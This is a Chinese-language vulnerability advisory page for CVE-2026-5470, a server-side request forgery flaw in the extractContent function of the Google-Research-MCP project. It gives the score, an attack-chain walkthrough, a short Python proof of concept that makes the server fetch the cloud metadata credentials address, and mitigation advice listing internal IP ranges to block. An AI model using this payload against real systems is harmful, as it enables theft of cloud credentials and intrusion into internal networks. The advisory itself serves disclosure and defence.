CVE-2026-5470 CVSS 6.3 中危

CVE-2026-5470 Google-Research-MCP SSRF漏洞

披露日期: 2026-04-03

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5470

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

mixelpixx Google-Research-MCP

漏洞概述

mixelpixx Google-Research-MCP 组件存在服务端请求伪造（SSRF）漏洞。该漏洞源于 `src/services/content-extractor.service.ts` 文件中的 `extractContent` 函数，由于对参数 URL 缺乏充分验证，攻击者可远程发起攻击，导致服务端发起恶意请求，影响机密性、完整性和可用性。

技术细节

该漏洞位于 Model Context Protocol Handler 组件的 `src/services/content-extractor.service.ts` 文件中。核心问题在于 `extractContent` 函数直接使用了用户可控的 `URL` 参数发起网络请求，而未对该参数进行严格的格式校验或内网访问限制。攻击者可以通过构造恶意的 URL（例如指向内网服务的 `http://127.0.0.1` 或云元数据地址），诱导服务器向该地址发送请求。由于该产品采用滚动发布模型，受影响的具体版本号难以确定，但涉及特定 Commit (1e062d7... 等)。攻击权限要求低且无需用户交互，易于被利用进行内网端口探测或敏感数据窃取。攻击者利用此漏洞可绕过防火墙限制，直接探测内网资产，甚至结合其他漏洞实现进一步渗透。

攻击链分析

STEP 1

侦察与定位

攻击者识别出互联网上运行的 mixelpixx Google-Research-MCP 服务，并确认其 content-extractor 功能接口。

STEP 2

构造恶意载荷

攻击者构造包含恶意 URL（如内网 IP 地址、云元数据服务地址）的请求参数，准备发送给目标服务器。

STEP 3

发送利用请求

攻击者向目标服务器的 `extractContent` 接口发送包含恶意 URL 参数的请求。

STEP 4

服务端请求执行

服务器端未经验证直接获取 URL 参数，并向攻击者指定的内部地址发起 HTTP 请求。

STEP 5

信息泄露与进一步攻击

攻击者根据服务器响应的时间或内容，判断内网端口状态或窃取敏感信息（如云凭证），进而实施内网渗透。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-5470: SSRF in Google-Research-MCP
# Target: The vulnerable endpoint handling content extraction

target_url = "http://vulnerable-host/api/extract-content"

# Malicious payload pointing to an internal service (e.g., local admin panel)
# Attackers can change this to 127.0.0.1 or internal IP ranges
malicious_url = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

payload = {
    "URL": malicious_url
}

try:
    response = requests.post(target_url, json=payload)
    if response.status_code == 200:
        print("[+] Potential SSRF vulnerability triggered!")
        print("[+] Server Response:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

mixelpixx Google-Research-MCP (commit 1e062d7bd887bfe5f6e582b6cc288bb897b35cf2)

mixelpixx Google-Research-MCP (commit ca613b736ab787bc926932f59cddc69457185a83)

防御指南

临时缓解措施

建议在应用层面对URL参数进行严格校验，禁止访问内网IP段（如127.0.0.1, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16）或元数据服务地址。同时，限制出站网络请求的协议和端口，直至官方发布修复补丁。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5470
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5470
3 Details https://www.cvedetails.com/cve/CVE-2026-5470/
4 VulDB https://vuldb.com/cve/CVE-2026-5470
5 Link https://github.com/wing3e/public_exp/issues/21
6 Link https://vuldb.com/submit/781778
7 Link https://vuldb.com/vuln/355074
8 Link https://vuldb.com/vuln/355074/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表